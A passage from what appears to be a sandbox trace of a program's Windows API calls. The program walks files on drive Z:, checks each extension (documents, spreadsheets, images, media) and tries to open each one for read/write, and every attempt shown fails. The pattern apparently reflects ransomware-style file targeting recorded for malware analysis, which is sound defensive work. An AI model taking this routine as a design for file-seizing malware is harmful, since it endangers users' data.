nFileSizeLow=0xeb6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1qRDSM.ots", cAlternateFileName="")) returned 1 [0177.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.741] PathFindExtensionW (pszPath="Z:\\1qRDSM.ots") returned=".ots" [0177.745] CreateFileW (lpFileName="Z:\\1qRDSM.ots" (normalized: "z:\\1qrdsm.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.747] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc96c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3E3mNRHtjqDkD.docx", cAlternateFileName="")) returned 1 [0177.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.747] PathFindExtensionW (pszPath="Z:\\3E3mNRHtjqDkD.docx") returned=".docx" [0177.752] CreateFileW (lpFileName="Z:\\3E3mNRHtjqDkD.docx" (normalized: "z:\\3e3mnrhtjqdkd.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.754] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13677, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZDi6IHm9Gll50uy.wav", cAlternateFileName="")) returned 1 [0177.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.754] PathFindExtensionW (pszPath="Z:\\ZDi6IHm9Gll50uy.wav") returned=".wav" [0177.759] CreateFileW (lpFileName="Z:\\ZDi6IHm9Gll50uy.wav" (normalized: "z:\\zdi6ihm9gll50uy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.761] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x151b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrhycV54UDwXeOVHbaY.ppt", cAlternateFileName="")) returned 1 [0177.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.761] PathFindExtensionW (pszPath="Z:\\nrhycV54UDwXeOVHbaY.ppt") returned=".ppt" [0177.766] CreateFileW (lpFileName="Z:\\nrhycV54UDwXeOVHbaY.ppt" (normalized: "z:\\nrhycv54udwxeovhbay.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.768] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf1b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SVUGEj8tBupVWECY.xls", cAlternateFileName="")) returned 1 [0177.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.768] PathFindExtensionW (pszPath="Z:\\SVUGEj8tBupVWECY.xls") returned=".xls" [0177.773] CreateFileW (lpFileName="Z:\\SVUGEj8tBupVWECY.xls" (normalized: "z:\\svugej8tbupvwecy.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.774] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x145ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ety66.avi", cAlternateFileName="")) returned 1 [0177.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.775] PathFindExtensionW (pszPath="Z:\\Ety66.avi") returned=".avi" [0177.780] CreateFileW (lpFileName="Z:\\Ety66.avi" (normalized: "z:\\ety66.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.781] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17f4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quWT4PWu.png", cAlternateFileName="")) returned 1 [0177.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.781] PathFindExtensionW (pszPath="Z:\\quWT4PWu.png") returned=".png" [0177.786] CreateFileW (lpFileName="Z:\\quWT4PWu.png" (normalized: "z:\\quwt4pwu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.788] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x117b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j9JYPCvbXdUa8a9vWWKs.pptx", cAlternateFileName="")) returned 1 [0177.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.789] PathFindExtensionW (pszPath="Z:\\j9JYPCvbXdUa8a9vWWKs.pptx") returned=".pptx" [0177.794] CreateFileW (lpFileName="Z:\\j9JYPCvbXdUa8a9vWWKs.pptx" (normalized: "z:\\j9jypcvbxdua8a9vwwks.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.795] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15446, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Khw7ULNZgmj8e7C.ots", cAlternateFileName="")) returned 1 [0177.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.795] PathFindExtensionW (pszPath="Z:\\Khw7ULNZgmj8e7C.ots") returned=".ots" [0177.801] CreateFileW (lpFileName="Z:\\Khw7ULNZgmj8e7C.ots" (normalized: "z:\\khw7ulnzgmj8e7c.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.802] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13cde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uKTB42S.swf", cAlternateFileName="")) returned 1 [0177.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.802] PathFindExtensionW (pszPath="Z:\\uKTB42S.swf") returned=".swf" [0177.808] CreateFileW (lpFileName="Z:\\uKTB42S.swf" (normalized: "z:\\uktb42s.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.809] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb0b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c9ePpp.flv", cAlternateFileName="")) returned 1 [0177.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.809] PathFindExtensionW (pszPath="Z:\\c9ePpp.flv") returned=".flv" [0177.814] CreateFileW (lpFileName="Z:\\c9ePpp.flv" (normalized: "z:\\c9eppp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.817] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13285, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRokYgqilEOKg8Z1jJGf.xlsx", cAlternateFileName="")) returned 1 [0177.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.817] PathFindExtensionW (pszPath="Z:\\TRokYgqilEOKg8Z1jJGf.xlsx") returned=".xlsx" [0177.822] CreateFileW (lpFileName="Z:\\TRokYgqilEOKg8Z1jJGf.xlsx" (normalized: "z:\\trokygqileokg8z1jjgf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quhItobo4pfIROy.png", cAlternateFileName="")) returned 1 [0177.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.823] PathFindExtensionW (pszPath="Z:\\quhItobo4pfIROy.png") returned=".png" [0177.829] CreateFileW (lpFileName="Z:\\quhItobo4pfIROy.png" (normalized: "z:\\quhitobo4pfiroy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.830] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14269, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TkK2vz7hevOC5xNhwJg.mp4", cAlternateFileName="")) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.830] PathFindExtensionW (pszPath="Z:\\TkK2vz7hevOC5xNhwJg.mp4") returned=".mp4" [0177.836] CreateFileW (lpFileName="Z:\\TkK2vz7hevOC5xNhwJg.mp4" (normalized: "z:\\tkk2vz7hevoc5xnhwjg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.837] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x163c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Lx84HE6bsZ.wav", cAlternateFileName="")) returned 1 [0177.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.838] PathFindExtensionW (pszPath="Z:\\8Lx84HE6bsZ.wav") returned=".wav" [0177.843] CreateFileW (lpFileName="Z:\\8Lx84HE6bsZ.wav" (normalized: "z:\\8lx84he6bsz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.844] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1469a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GbsTd6ktJr7.ppt", cAlternateFileName="")) returned 1 [0177.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.845] PathFindExtensionW (pszPath="Z:\\GbsTd6ktJr7.ppt") returned=".ppt" [0177.850] CreateFileW (lpFileName="Z:\\GbsTd6ktJr7.ppt" (normalized: "z:\\gbstd6ktjr7.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.851] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8fe9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iN0JFI.xlsx", cAlternateFileName="")) returned 1 [0177.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.851] PathFindExtensionW (pszPath="Z:\\iN0JFI.xlsx") returned=".xlsx" [0177.856] CreateFileW (lpFileName="Z:\\iN0JFI.xlsx" (normalized: "z:\\in0jfi.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.858] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8d4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pbmjHxBll.rtf", cAlternateFileName="")) returned 1 [0177.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.858] PathFindExtensionW (pszPath="Z:\\pbmjHxBll.rtf") returned=".rtf" [0177.863] CreateFileW (lpFileName="Z:\\pbmjHxBll.rtf" (normalized: "z:\\pbmjhxbll.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.865] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x54ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2xLvx0ttbb57lMVLO.ods", cAlternateFileName="")) returned 1 [0177.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.865] PathFindExtensionW (pszPath="Z:\\2xLvx0ttbb57lMVLO.ods") returned=".ods" [0177.870] CreateFileW (lpFileName="Z:\\2xLvx0ttbb57lMVLO.ods" (normalized: "z:\\2xlvx0ttbb57lmvlo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.871] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18602, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iRSv1LGGODPvwvEebQE.png", cAlternateFileName="")) returned 1 [0177.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.871] PathFindExtensionW (pszPath="Z:\\iRSv1LGGODPvwvEebQE.png") returned=".png" [0177.877] CreateFileW (lpFileName="Z:\\iRSv1LGGODPvwvEebQE.png" (normalized: "z:\\irsv1lggodpvwveebqe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.878] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1571a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AbOnaFU.xlsx", cAlternateFileName="")) returned 1 [0177.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.879] PathFindExtensionW (pszPath="Z:\\AbOnaFU.xlsx") returned=".xlsx" [0177.883] CreateFileW (lpFileName="Z:\\AbOnaFU.xlsx" (normalized: "z:\\abonafu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.884] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xce67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nFDzD.png", cAlternateFileName="")) returned 1 [0177.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.884] PathFindExtensionW (pszPath="Z:\\nFDzD.png") returned=".png" [0177.889] CreateFileW (lpFileName="Z:\\nFDzD.png" (normalized: "z:\\nfdzd.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.891] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15e55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSbSJ2ohxP3n6KDx.docx", cAlternateFileName="")) returned 1 [0177.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.891] PathFindExtensionW (pszPath="Z:\\TSbSJ2ohxP3n6KDx.docx") returned=".docx" 